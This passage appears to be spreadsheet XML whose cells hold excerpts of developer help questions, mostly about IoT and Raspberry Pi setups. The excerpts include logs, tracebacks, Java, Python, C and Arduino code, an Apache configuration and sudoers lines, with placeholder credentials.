02-20 19:57:07.474 12103-12103/ir.shafadoc.handset D/line: 192.168.1.11     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.474 12103-12103/ir.shafadoc.handset D/line: 192.168.1.30     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.475 12103-12103/ir.shafadoc.handset D/line: 192.168.1.23     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.475 12103-12103/ir.shafadoc.handset D/line: 192.168.1.16     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.475 12103-12103/ir.shafadoc.handset D/line: 192.168.1.9      0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.476 12103-12103/ir.shafadoc.handset D/line: 192.168.1.28     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.476 12103-12103/ir.shafadoc.handset D/line: 192.168.1.21     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.477 12103-12103/ir.shafadoc.handset D/line: 192.168.1.14     0x1         0x0         00:00:00:00:00:00     *        wlan0
as you can see only modem has Mac address in arp cache.</t>
  </si>
  <si>
    <t>This is subscriber code in java
import com.google.api.gax.core.CredentialsProvider;
import com.google.auth.Credentials;
import com.google.auth.oauth2.GoogleCredentials;
import com.google.cloud.pubsub.v1.AckReplyConsumer;
import com.google.cloud.pubsub.v1.MessageReceiver;
import com.google.cloud.pubsub.v1.Subscriber;
import com.google.common.collect.Lists;
import com.google.pubsub.v1.ProjectSubscriptionName;
import com.google.pubsub.v1.PubsubMessage;
import java.io.FileInputStream;
import java.io.IOException;
import java.util.concurrent.BlockingQueue;
import java.util.concurrent.LinkedBlockingDeque;
public class SubscriberExample {
    private static final String PROJECT_ID = "my-project-id";
    private static final BlockingQueue&lt;PubsubMessage&gt; messages = new LinkedBlockingDeque&lt;&gt;();
    static class MessageReceiverExample implements MessageReceiver {
        @Override
        public void receiveMessage(PubsubMessage message, AckReplyConsumer consumer) {
            messages.offer(message);
            consumer.ack();
        }
    }
    public static void main(String... args) throws Exception {
        String subscriptionId = "YOUR_SUBSCRIBER_ID";
        ProjectSubscriptionName subscriptionName = ProjectSubscriptionName.of(PROJECT_ID, subscriptionId);
        Subscriber subscriber = null;
        try {
            GoogleCredentials credentials = GoogleCredentials
                    .fromStream(new FileInputStream("~/google_cloud_pubsub-Project-0b66ab8c5060.json")) // you can get here https://cloud.google.com/docs/authentication/getting-started
                    .createScoped(Lists.newArrayList("https://www.googleapis.com/auth/cloud-platform"));
            subscriber = Subscriber.newBuilder(subscriptionName, new MessageReceiverExample())
                    .setCredentialsProvider(new CredentialsProvider() {
                        @Override
                        public Credentials getCredentials() throws IOException {
                            return credentials;
                        }
                    }).build();
            subscriber.startAsync().awaitRunning();
            while (true) {
                PubsubMessage message = messages.take();
                System.out.println("Message Id: " + message.getMessageId());
                System.out.println("Data: " + message.getData().toStringUtf8());
            }
        } finally {
            if (subscriber != null) {
                subscriber.stopAsync();
            }
        }
    }
}</t>
  </si>
  <si>
    <t>But When I try to connect on AWS IoT MQTT with WebSocket, I get the following error:
Using the certificate generated by running this command: wget
Error:
    Traceback (most recent call last): 
    File "./awshome.py", line 60, in &lt;module&gt; iot = createIoT() 
    File "./awshome.py", line 50, in createIoT iot.connect() File "/home/pi/.local/lib/python2.7/site-packages/AWSIoTPythonSDK/MQTTLib.py", line 1216, in connect return         
    self._AWSIoTMQTTClient.connect(keepAliveIntervalSecond) 
    File "/home/pi/.local/lib/python2.7/site-packages/AWSIoTPythonSDK/MQTTLib.py", line 485, in connect return self._mqtt_core.connect(keepAliveIntervalSecond) 
    File "/home/pi/.local/lib/python2.7/site-packages/AWSIoTPythonSDK/core/protocol/mqtt_core.py", line 192, in connect self.connect_async(keep_alive_sec, self._create_blocking_ack_callback(event)) 
    File "/home/pi/.local/lib/python2.7/site-packages/AWSIoTPythonSDK/core/protocol/mqtt_core.py", line 219, in connect_async 
    raise e 
    ssl.SSLError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:661)ssl.SSLError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:661)</t>
  </si>
  <si>
    <t>Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Using config file: /etc/iotedge/config.yaml
Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Starting Azure IoT Edge Security Daemon
Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Version - 1.0.7
Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Using runtime network id azure-iot-edge
Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Initializing the module runtime...
Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Initializing module runtime...
Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Successfully initialized module runtime
Aug 20 20:38:22 reliagate-10-12 iotedged[3466]: 2019-08-20T20:38:22Z [INFO] - Finished initializing the module runtime.</t>
  </si>
  <si>
    <t>3.4.3+
('1.5.1', '0.9.2', '1.4.2')
Traceback (most recent call last):
  File "testauthgoogle.py", line 19, in &lt;module&gt;
    service = apiclient.discovery.build('calendar', 'v3', http=http_auth)
  File "/usr/local/lib/python3.4/dist-packages/oauth2client/util.py", line 142, in positional_wrapper
    return wrapped(*args, **kwargs)
  File "/usr/local/lib/python3.4/dist-packages/googleapiclient/discovery.py", line 196, in build
    cache)
  File "/usr/local/lib/python3.4/dist-packages/googleapiclient/discovery.py", line 242, in _retrieve_discovery_doc
    resp, content = http.request(actual_url)
  File "/usr/local/lib/python3.4/dist-packages/oauth2client/client.py", line 565, in new_request
    self._refresh(request_orig)
  File "/usr/local/lib/python3.4/dist-packages/oauth2client/client.py", line 835, in _refresh
    self._do_refresh_request(http_request)
  File "/usr/local/lib/python3.4/dist-packages/oauth2client/client.py", line 862, in _do_refresh_request
    body = self._generate_refresh_request_body()
  File "/usr/local/lib/python3.4/dist-packages/oauth2client/client.py", line 1541, in _generate_refresh_request_body
    assertion = self._generate_assertion()
  File "/usr/local/lib/python3.4/dist-packages/oauth2client/client.py", line 1670, in _generate_assertion
    private_key, self.private_key_password), payload)
  File "/usr/local/lib/python3.4/dist-packages/oauth2client/_openssl_crypt.py", line 120, in from_string
    pkey = crypto.load_pkcs12(key, password).get_privatekey()
TypeError: must be str, not bytes
I have no idea where to go further: the Python and libraries versions are the same and they behave differently nevertheless.</t>
  </si>
  <si>
    <t>I have this simple script that spits out the buckets in my GCS:
The top of my  file has the following (with real values for everything inside brackets):
# Google OAuth2 service account credentials (for "gs://" URIs):
gs_service_key_file = /home/pi/dev/camera/cl-camera-&lt;id&gt;.json
gs_service_client_id = '&lt;user&gt;@&lt;id&gt;.iam.gserviceaccount.com'
Everything works fine when running without sudo, but once I add sudo (I need access to GPIO pins since this is on a RPi), I get the following error:
Traceback (most recent call last):
  File "gcs-test.py", line 24, in &lt;module&gt;
    for bucket in uri.get_all_buckets(headers=header_values):
  File "/usr/local/lib/python2.7/dist-packages/boto/storage_uri.py", line 584, in get_all_buckets
    conn = self.connect()
  File "/usr/local/lib/python2.7/dist-packages/boto/storage_uri.py", line 140, in connect
    **connection_args)
  File "/usr/local/lib/python2.7/dist-packages/boto/gs/connection.py", line 47, in __init__
    suppress_consec_slashes=suppress_consec_slashes)
  File "/usr/local/lib/python2.7/dist-packages/boto/s3/connection.py", line 191, in __init__
    validate_certs=validate_certs, profile_name=profile_name)
  File "/usr/local/lib/python2.7/dist-packages/boto/connection.py", line 569, in __init__
    host, config, self.provider, self._required_auth_capability())
  File "/usr/local/lib/python2.7/dist-packages/boto/auth.py", line 1021, in get_auth_handler
    'Check your credentials' % (len(names), str(names)))
boto.exception.NoAuthHandlerFound: No handler was ready to authenticate.</t>
  </si>
  <si>
    <t>It registers the info profile 
            //bt_profile_tab[param-&gt;reg.app_id].gatts_if = gatts_if; //Nothing gets registered when doing this
            //bt_profile_tab[WIFI_IDX].gatts_if = gatts_if; //Doing this always fails to register both.. Info Service is all that gets registered
        } else {
            ESP_LOGE(TAG_IBLUETOOTH, "reg app failed, app_id %04x, status %d", param-&gt;reg.app_id, param-&gt;reg.status);
            return;
        }
    }
    do {
        int idx;
        for (idx = 0; idx &lt; PROFILE_NUM; idx++) {
            /* ESP_GATT_IF_NONE, not specify a certain gatt_if, need to call every profile cb function */
            if (gatts_if == ESP_GATT_IF_NONE || gatts_if == bt_profile_tab[idx].gatts_if) {
                if (bt_profile_tab[idx].gatts_cb) {
                    bt_profile_tab[idx].gatts_cb(event, gatts_if, param);
                }
            }
        }
    } while (0);
}
An example of one of the Service Event Handlers:
static const uint16_t INFO_SERV_uuid                = ESP_GATT_UUID_DEVICE_INFO_SVC;  //0x180A
static const uint16_t INFO_SERV_char_sysid_uuid         = ...;
static const uint16_t INFO_SERV_char_model_uuid         = ...;
static const uint16_t INFO_SERV_char_serial_uuid        = ...;
static const uint16_t INFO_SERV_char_fw_uuid        = ...;
static const uint16_t INFO_SERV_char_protocol_uuid  = ...;
static const uint8_t INFO_SERV_char_sysid_descr[]       = ...;
static const uint8_t INFO_SERV_char_model_descr[]       = ...;
static const uint8_t INFO_SERV_char_serial_descr[]      = ...;
static const uint8_t INFO_SERV_char_fw_descr[]      = ...;
static const uint8_t INFO_SERV_char_protocol_descr[]        = ...;
static const esp_gatts_attr_db_t info_serv_gatt_db[INFO_NB] =
{
    [INFO_SERV] = {{ESP_GATT_AUTO_RSP}, {ESP_UUID_LEN_16, (uint8_t *) &amp;primary_service_uuid, ESP_GATT_PERM_READ, sizeof(uint16_t), sizeof(INFO_SERV_uuid), (uint8_t *)&amp;INFO_SERV_uuid}},
...
 };
static void info_event_handler(esp_gatts_cb_event_t event, esp_gatt_if_t gatts_if, esp_ble_gatts_cb_param_t *param)
{
    switch (event) {
        case ESP_GATTS_REG_EVT:{
            esp_err_t set_dev_name_ret = esp_ble_gap_set_device_name(DEVICE_NAME);
            //config adv data
            esp_err_t ret = esp_ble_gap_config_adv_data(&amp;adv_data);
            adv_config_done |= ADV_CONFIG_FLAG;
            //config scan response data
            ret = esp_ble_gap_config_adv_data(&amp;scan_rsp_data);
            adv_config_done |= SCAN_RSP_CONFIG_FLAG;
            esp_err_t create_attr_ret = esp_ble_gatts_create_attr_tab(info_serv_gatt_db, gatts_if, INFO_NB, SVC_INST_ID);
        }
            break;
        case ESP_GATTS_READ_EVT:
...
            case ESP_GATTS_EXEC_WRITE_EVT:
...
            case ESP_GATTS_MTU_EVT:
                ESP_LOGI(TAG_IBLUETOOTH, "ESP_GATTS_MTU_EVT, MTU %d", param-&gt;mtu.mtu);
                break;
        case ESP_GATTS_CONF_EVT:
            ESP_LOGI(TAG_IBLUETOOTH, "ESP_GATTS_CONF_EVT, status = %d", param-&gt;conf.status);
            break;
        case ESP_GATTS_START_EVT:
            ESP_LOGI(TAG_IBLUETOOTH, "SERVICE_START_EVT, status %d, service_handle %d", param-&gt;start.status, param-&gt;start.service_handle);
            break;
        case ESP_GATTS_CONNECT_EVT:
            ESP_LOGI(TAG_IBLUETOOTH, "ESP_GATTS_CONNECT_EVT, conn_id = %d", param-&gt;connect.conn_id);
            esp_log_buffer_hex(TAG_IBLUETOOTH, param-&gt;connect.remote_bda, 6);
            esp_ble_conn_update_params_t conn_params = {0};
            memcpy(conn_params.bda, param-&gt;connect.remote_bda, sizeof(esp_bd_addr_t));
            /* For the IOS system, please reference the apple official documents about the ble connection parameters restrictions.</t>
  </si>
  <si>
    <t>mai 27 13:42:56 raspberrypi polkitd(authority=local)[810]: Unregistered Authentication Agent for unix-process:4643:531066 (system bus name :1.49, object path /org/freedesktop/PolicyKit1/Authentica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
mai 27 13:42:54 raspberrypi polkitd(authority=local)[810]: Operator of unix-session:c1 successfully authenticated as unix-user:pi to gain TEMPORARY authorization for action org.freedesktop.systemd1.manage-units for system-bus-name::1.5
mai 27 13:42:54 raspberrypi systemd[1]: Starting MariaDB 10.1.38 database server...
-- Subject: L'unit (unit) mariadb.service a commenc  dmarrer
-- Defined-By: systemd
-- Support: https://www.debian.org/support
-- 
-- L'unit (unit) mariadb.service a commenc  dmarrer.</t>
  </si>
  <si>
    <t>mai 27 13:42:56 raspberrypi polkitd(authority=local)[810]: Unregistered Authentication Agent for unix-process:4643:531066 (system bus name :1.49, object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale fr_FR.UTF-8) (disconn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/org/freedesktop/PolicyKit1/AuthenticationAgent, locale fr_F
mai 27 13:42:54 raspberrypi polkitd(authority=local)[810]: Operator of unix-session:c1 successfully authenticated as unix-user:pi to gain TEMPORARY authorization for action org.freedesktop.systemd1.manage-units for system-bus-name::1.50 [systemctl start mysql] (o
mai 27 13:42:54 raspberrypi systemd[1]: Starting MariaDB 10.1.38 database server...
-- Subject: L'unit (unit) mariadb.service a commenc  dmarrer
-- Defined-By: systemd
-- Support: https://www.debian.org/support
-- 
-- L'unit (unit) mariadb.service a commenc  dmarrer.</t>
  </si>
  <si>
    <t>mai 27 13:42:56 raspberrypi polkitd(authority=local)[810]: Unregistered Authentication Agent for unix-process:4643:531066 (system bus name :1.49, object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale fr_FR.UTF-8) (disconnected from bus)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/org/freedesktop/PolicyKit1/AuthenticationAgent, locale fr_FR.UTF-8)
mai 27 13:42:54 raspberrypi polkitd(authority=local)[810]: Operator of unix-session:c1 successfully authenticated as unix-user:pi to gain TEMPORARY authorization for action org.freedesktop.systemd1.manage-units for system-bus-name::1.50 [systemctl start mysql] (owned by unix-user:pi)
mai 27 13:42:54 raspberrypi systemd[1]: Starting MariaDB 10.1.38 database server...
-- Subject: L'unit (unit) mariadb.service a commenc  dmarrer
-- Defined-By: systemd
-- Support: https://www.debian.org/support
-- 
-- L'unit (unit) mariadb.service a commenc  dmarrer.</t>
  </si>
  <si>
    <t>Here's the library that I'm using to communicate with PMS5003:
PMS5003.cpp
PMS5003.h
Here's how I'm using it:
struct ParticulateMatterMeasurements {
private:
    bool _areValid = false;
    int PM01Value = 0;
    int PM25Value = 0;
    int PM10Value = 0;
public:
    void setAreValid(bool _areValid) {
        ParticulateMatterMeasurements::_areValid = _areValid;
    }
    bool getAreValid() const {
        return _areValid;
    }
    int getPM01Value() const {
        return PM01Value;
    }
    void setPM01Value(int PM01Value) {
        ParticulateMatterMeasurements::PM01Value = PM01Value;
    }
    int getPM25Value() const {
        return PM25Value;
    }
    void setPM25Value(int PM25Value) {
        ParticulateMatterMeasurements::PM25Value = PM25Value;
    }
    int getPM10Value() const {
        return PM10Value;
    }
    void setPM10Value(int PM10Value) {
        ParticulateMatterMeasurements::PM10Value = PM10Value;
    }
};
ParticulateMatterMeasurements getMeasurements() {
    ParticulateMatterMeasurements measurements;
    measurements.setAreValid(false);
    pms5003.processDataOn(Serial);
    measurements.setPM01Value(pms5003.getPM1());
    measurements.setPM25Value(pms5003.getPM25());
    measurements.setPM10Value(pms5003.getPM10());
    if (measurements.getPM01Value() != -1 &amp;&amp; measurements.getPM25Value() != -1 &amp;&amp; measurements.getPM10Value() != -1) {
        measurements.setAreValid(true);
    }
    return measurements;
}
The problem is that I get many checksum errors.</t>
  </si>
  <si>
    <t>mai 27 13:42:56 raspberrypi polkitd(authority=local)[810]: Unregistered Authentication Agent for unix-process:4643:531066 (
lines 1835-1857/1857 (END)
mai 27 13:42:22 raspberrypi kernel: Voltage normalised (0x00000000)
mai 27 13:42:50 raspberrypi polkitd(authority=local)[810]: Registered Authentication Agent for unix-process:4643:531066 (system bus name :1.49 [/usr/bin/pkttyagent --notify-fd 5 --fallback], objec
mai 27 13:42:54 raspberrypi polkitd(authority=local)[810]: Operator of unix-session:c1 successfully authenticated as unix-user:pi to gain TEMPORARY authorization for action org.freedesktop.systemd
mai 27 13:42:54 raspberrypi systemd[1]: Starting MariaDB 10.1.38 database server...
-- Subject: L'unit (unit) mariadb.service a commenc  dmarrer
-- Defined-By: systemd
-- Support: https://www.debian.org/support
-- 
-- L'unit (unit) mariadb.service a commenc  dmarrer.</t>
  </si>
  <si>
    <t>Here is the my full code:
import tweepy 
import csv
import sys
import serial
import struct
#Create Serial port object called arduinoSerialData
ser = serial.Serial("COM1", 57600)
connected = False
#Twitter API credentials
consumer_key = 'xx'
consumer_secret = 'xx'
access_key = 'xx'
access_secret = 'xx'
def get_user_tweets(user_name, num_tweets):
 # Open the Serial Connection
    ser.close()
    ser.open()
    loopVar = True
    #authorize twitter, initialize tweepy
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_key, access_secret)
    api = tweepy.API(auth)
    #initialize list to hold tweet colors
    tweets_colors = []
    #Initialize string to hold current tweet
    this_tweet = ""
    #Initialize string to hold current color
    this_color = ""
    #Initialize tuple to hold rgb values
    rgb = ()
    #Initialize list to hold rgb values
    rgb_values =[]
    #Call to get access tweets from specified user
    tweets = api.user_timeline(screen_name='color_OTD',count=num_tweets)
    #Create a csv file with the username of the given user
    #with open('%s_tweets.csv' % user_name, 'w', newline='') as f:
        #Create writer object and give csv column names
        #writer = csv.writer(f)
        #writer.writerow(['red','green','blue'])
    #Loop through all tweets accessed
    for tweet in tweets:
        #If the tweet isn't a retweet
        if not tweet.retweeted:
            #Get # with hex color value
            this_tweet = str(tweet.entities.get('hashtags'))
            #Access hex value within hashtag string
            this_color = this_tweet[11:17]
            #Append all colors to list
            tweets_colors.append(this_color)
            #Convert from hex to rgb
            rgb = tuple(int(this_color[i:i+2], 16) for i in (0, 2 ,4))
            #Add individual rgb values to list
            rgb_values = [rgb[0], rgb[1], rgb[2]]
            #Write rgb values to csv
            #writer.writerow(rgb_values)
            print(rgb[0])
            print(type(rgb[0]))
            print(rgb[1])
            print(type(rgb[1]))
            print(rgb[2])
            print(type(rgb[2]))
            if (ser.isOpen()):
            # Start a main loop
                while (loopVar):
                    # Prompt for Red value
                    redVal = rgb[0]
                    print(struct.pack('&gt;B', redVal))
                    ser.write("r" + struct.pack('&gt;B',redVal))
                    # Prompt for Green value
                    greenVal = rgb[1]
                    print(struct.pack('&gt;B', greenVal))
                    ser.write("g" + struct.pack('&gt;B',greenVal))
                    # Prompt for Blue value
                    blueVal = rgb[2]
                    print(struct.pack('&gt;B', blueVal))
                    ser.write("b" + struct.pack('&gt;B',blueVal))
                    # Check if user wants to end
                    loopCheck = raw_input('Loop (y/N):')
                    if (loopCheck == 'N'):
                        loopVar = False
        # After loop exits, close serial connection
        ser.close()
if __name__ == '__main__':
    get_user_tweets('color_OTD', 5)</t>
  </si>
  <si>
    <t>EDIT: Below is my httpd.conf file (note that because the actual file is so long, I have removed all comments):
ServerRoot "/usr/local/apache2"
Listen 80
LoadModule authn_file_module modules/mod_authn_file.so
LoadModule authn_core_module modules/mod_authn_core.so
LoadModule authz_host_module modules/mod_authz_host.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule authz_core_module modules/mod_authz_core.so
LoadModule access_compat_module modules/mod_access_compat.so
LoadModule auth_basic_module modules/mod_auth_basic.so
LoadModule reqtimeout_module modules/mod_reqtimeout.so
LoadModule filter_module modules/mod_filter.so
LoadModule mime_module modules/mod_mime.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule env_module modules/mod_env.so
LoadModule headers_module modules/mod_headers.so
LoadModule setenvif_module modules/mod_setenvif.so
LoadModule version_module modules/mod_version.so
LoadModule unixd_module modules/mod_unixd.so
LoadModule status_module modules/mod_status.so
LoadModule autoindex_module modules/mod_autoindex.so
LoadModule dir_module modules/mod_dir.so
LoadModule alias_module modules/mod_alias.so
LoadModule wsgi_module modules/mod_wsgi.so
&lt;IfModule unixd_module&gt;
User daemon
Group daemon
&lt;/IfModule&gt;
ServerAdmin you@example.com
ServerName [SERVER_IP_ADDRESS]:80 # Removed for security reasons
#&lt;Directory /&gt;
#    AllowOverride none
#    Require all denied
#&lt;/Directory&gt;
DocumentRoot "/usr/local/apache2/htdocs"
&lt;Directory "/usr/local/apache2/htdocs"&gt;
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
&lt;/Directory&gt;
&lt;IfModule dir_module&gt;
    DirectoryIndex index.html
&lt;/IfModule&gt;
&lt;Files ".ht*"&gt;
    Require all denied
&lt;/Files&gt;
ErrorLog "logs/error_log"
LogLevel warn
&lt;IfModule log_config_module&gt;
    LogFormat "%h %l %u %t \"%r\" %&gt;s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %&gt;s %b" common
    &lt;IfModule logio_module&gt;
      LogFormat "%h %l %u %t \"%r\" %&gt;s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    &lt;/IfModule&gt;
    CustomLog "logs/access_log" common
&lt;/IfModule&gt;
&lt;IfModule alias_module&gt;
    ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"
&lt;/IfModule&gt;
&lt;IfModule cgid_module&gt;
&lt;/IfModule&gt;
&lt;Directory "/usr/local/apache2/cgi-bin"&gt;
    AllowOverride None
    Options None
    Require all granted
&lt;/Directory&gt;
&lt;IfModule mime_module&gt;
        TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
&lt;/IfModule&gt;
&lt;IfModule proxy_html_module&gt;
Include conf/extra/proxy-html.conf
&lt;/IfModule&gt;
&lt;IfModule ssl_module&gt;
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
&lt;/IfModule&gt;
&lt;VirtualHost *:80&gt;
    ServerName [SERVER_IP_ADDRESS]:80 # Removed for security reasons
    WSGIScriptAlias / /var/the-1/django/The1/apache/django.wsgi
    &lt;Directory /var/the-1/django/The1/apache&gt;
        ###&lt;Files django.wsgi&gt;
            Order allow,deny
            Allow from all
        ###&lt;/Files&gt;
    &lt;/Directory&gt;
&lt;/VirtualHost&gt;
EDIT 2 (Solution): There were some problems with my above config file.</t>
  </si>
  <si>
    <t>what I am useing
Arduino/Genuino Uno chip mega328u
Arduino IDE V1.6.12
this should not matter because I just need it to verify
main.ino file
mole.h file
#ifndef mole_h
#define mole_h
#include "Arduino.h"
class mole
{
  public:
    mole(int p_out, int p_in);
    void changeMoleSate();
    void resetMole();
    void setUpTimer(int up_timer);
    int  getUpTimer();
    //I think I will move these to that main class 
    //************************
    void decrementUpTimer();
    //************************
    void setRecoveryTimer(int recovery_timer);
    int  getRecoveryTimer();
    //************************
    void decrementRecoveryTimer();
    //************************
    boolean sould_be_up = false;
  private:
    int _up_timer = 0;
    int _recovery_timer = 0;
    int _pin_out;
    int _pin_in;
    // todo
    //void setPinsModes();
};
#endif
mole.cpp file
#include "Arduino.h"
#include "mole.h"
mole::mole(int p_out, int p_in) {
  this._pin_out = p_out;
  this._pin_in  = p_in;
}
// todo
/*void mole::setPinsModes() { 
  pinMode(_pino , OUTPUT);
  pinMode(_pini , INPUT );
}*/
void mole::changeMoleSate() {
  if (sould_be_up == false) {
    digitalWrite(_pino, LOW);
  }
  else {
    digitalWrite(_pini, HIGH);
  }
}
void mole::resetMole() {
  sould_be_up = false;
  _up_timer = 0;
  _recovery_timer = 0;
  digitalWrite(_pino, LOW);
}
void mole::setUpTimer(int up_timer) {
  _up_timer = up_timer;
}
int mole::getUpTimer() {
  return _up_timer;
}
void mole::decrementUpTimer() {
  if (_up_timer &gt; 0) {
    _up_timer--;
  }
}
void mole::setRecoveryTimer(int recovery_timer) {
  _recovery_timer += recovery_timer;
}
int mole::getRecoveryTimer() {
  return _recovery_timer;
}
void mole::decrementRecoveryTimer() {
  if (_recovery_timer &gt; 0) {
    _recovery_timer--;
  }
}</t>
  </si>
  <si>
    <t>* @param {(String | Object)} url the URL of the request, or settings Object
 * @param {(Object | String)} settings settings Object, or username
 * @param {String} username username, or password if username was provided 
 *          instead of settings
 * @param {String} password password
 * @returns {Promise} promise interface to call back for AJAX results
 */
DigestAjax.ajaxDigest = function(url, settings, username, password) {
    //Settings, username, and password variables
    var s = {}, u, p;
    //Extract the path from the URL, which is used for qop
    var a = document.createElement('a');
    if (typeof url === 'object') {
        //ajaxDigest(settings)
        s = url;
        a.href = s.url;
    }
    else if (typeof url === 'string') {
        if (typeof settings === 'string') {
            //ajaxDigest(url, username, password)
            u = settings ?</t>
  </si>
  <si>
    <t>mai 27 13:42:56 raspberrypi systemd[1]: mariadb.service: Unit entered failed sta
mai 27 13:42:56 raspberrypi systemd[1]: mariadb.service: Failed with result 'exi
mai 27 13:42:56 raspberrypi polkitd(authority=local)[810]: Unregistered Authenti
lines 1835-1857/1857 (END)
mai 27 13:42:22 raspberrypi kernel: Voltage normalised (0x00000000)
mai 27 13:42:50 raspberrypi polkitd(authority=local)[810]: Registered Authentication Agent for unix-process:4643:531066 (sy
mai 27 13:42:54 raspberrypi polkitd(authority=local)[810]: Operator of unix-session:c1 successfully authenticated as unix-u
mai 27 13:42:54 raspberrypi systemd[1]: Starting MariaDB 10.1.38 database server...
-- Subject: L'unit (unit) mariadb.service a commenc  dmarrer
-- Defined-By: systemd
-- Support: https://www.debian.org/support
-- 
-- L'unit (unit) mariadb.service a commenc  dmarrer.</t>
  </si>
  <si>
    <t>EDIT:
Here is the full console output:
Unhandled Exception: System.Security.Cryptography.CryptographicException: Couldn't decode XML ---&gt; System.Security.Cryptography.CryptographicException: Private/public key mismatch
  at Mono.Security.Cryptography.RSAManaged.ImportParameters (RSAParameters parameters) [0x00000] in :0
  at System.Security.Cryptography.RSACryptoServiceProvider.ImportParameters (RSAParameters parameters) [0x00000] in :0
  at System.Security.Cryptography.RSA.FromXmlString (System.String xmlString) [0x00000] in :0
  --- End of inner exception stack trace ---
  at System.Security.Cryptography.RSA.FromXmlString (System.String xmlString) [0x00000] in :0
  at PHPEncryptTest.RSA.EncryptData (System.String strData2Encrypt) [0x00000] in :0
  at PHPEncryptTest.Program.Main (System.String[] args) [0x00000] in :0
[ERROR] FATAL UNHANDLED EXCEPTION: System.Security.Cryptography.CryptographicException: Couldn't decode XML ---&gt; System.Security.Cryptography.CryptographicException: Private/public key mismatch
  at Mono.Security.Cryptography.RSAManaged.ImportParameters (RSAParameters parameters) [0x00000] in :0
  at System.Security.Cryptography.RSACryptoServiceProvider.ImportParameters (RSAParameters parameters) [0x00000] in :0
  at System.Security.Cryptography.RSA.FromXmlString (System.String xmlString) [0x00000] in :0
  --- End of inner exception stack trace ---
  at System.Security.Cryptography.RSA.FromXmlString (System.String xmlString) [0x00000] in :0
  at PHPEncryptTest.RSA.EncryptData (System.String strData2Encrypt) [0x00000] in :0
  at PHPEncryptTest.Program.Main (System.String[] args) [0x00000] in :0</t>
  </si>
  <si>
    <t>For azure iothub, you reference the shared access policy as the username in the format policyName@sas.root.IoTHubName
When I use these (obfuscated) credentials with qpid proton as follows
I get the following error
(debug print of connection string being passed) amqps://iothubowner@sas.root.HubName:SharedAccessSignature
  sr=HubName.azure-devices.net%2fmessages&amp;sig=PERCENT_ENCODED_SIG&amp;se=1493454429&amp;st=1490861529&amp;skn=iothubowner@HubName.azure-devices.net:5671
Traceback (most recent call last):   File "readProton2.py", line 27,
  in 
      messenger.subscribe("%s%s" % ( base, entityName))   File "/usr/lib/python2.7/dist-packages/proton/__init__.py", line 496, in
  subscribe
      self._check(pn_error_code(pn_messenger_error(self._mng)))   File "/usr/lib/python2.7/dist-packages/proton/__init__.py", line 300, in
  _check
      raise exc("[%s]: %s" % (err, pn_error_text(pn_messenger_error(self._mng))))
proton.MessengerException: [-2]: CONNECTION ERROR
  (sas.root.HubName:SharedAccessSignature
  sr=HubName.azure-devices.net%2fmessages&amp;sig=PERCENT_ENCODED_SIG&amp;se=1493454429&amp;st=1490861529&amp;skn=iothubowner@HubName.azure-devices.net:5671):
  getaddrinfo(sas.root.HubName, SharedAccessSignature
  sr=HubName.azure-devices.net%2fmessages&amp;sig=PERCENT_ENCODED_SIG&amp;se=1493454429&amp;st=149086152
  9&amp;skn=iothubowner@HubName.azure-devices.net:5671): Servname not
  supported for ai_socktype
The final error message looks like parsing of the connection string is being mangled (on a very quick look, pni_default_rewrite in qpid-proton/messenger.c appears to use the first occurrence of @ to split the connection string which could be the problem)
However, I'm new to AMQP and proton, so before I raise a bug, want to check whether others have successfully use proton to iothub, or if I've missed something?</t>
  </si>
  <si>
    <t>So I finished setting up my Raspberry Pi 3 for a crypto wallet, which need to be 24/7 running for staking (it means that if you have money on the wallet and let it run, sometimes you'll get a reward for that)
But now I want to automatize things for a bit, so here is the situation :
I want to create a script running 24/7 and alerting me by email if staking is off, or if the wallet crash, to check that I have a command,  which returns :
and also the command getstakingstatus which returns :
{
    "validtime" : true,
    "haveconnections" : true,
    "walletunlocked" : false,
    "mintablecoins" : false,
    "enoughcoins" : true,
    "mnsync" : true,
    "staking status" : false
}
As you can see, there is a line "staking status", and I want to check if it's returning "true" or "Staking Active"
I also want to be able to restart the wallet in case it crashes, so I don't ave to go to my rpi and restart it by hand..</t>
  </si>
  <si>
    <t>The first process to do so was:
  Process name: [[32582,1],1]
  Exit code:    1
--------------------------------------------------------------------------
I've run sudo visudo and my file on both nodes looks like that:
# User privilege specification
root    ALL=(ALL:ALL) ALL
pi      ALL = NOPASSWD:SETENV:  /etc/alternatives/mpirun
pi      ALL=NOPASSWD:SETENV:    /usr/bin/orterun
pi      ALL=NOPASSWD:SETENV:    /usr/bin/mpirun
When I run everything on one node it just works:
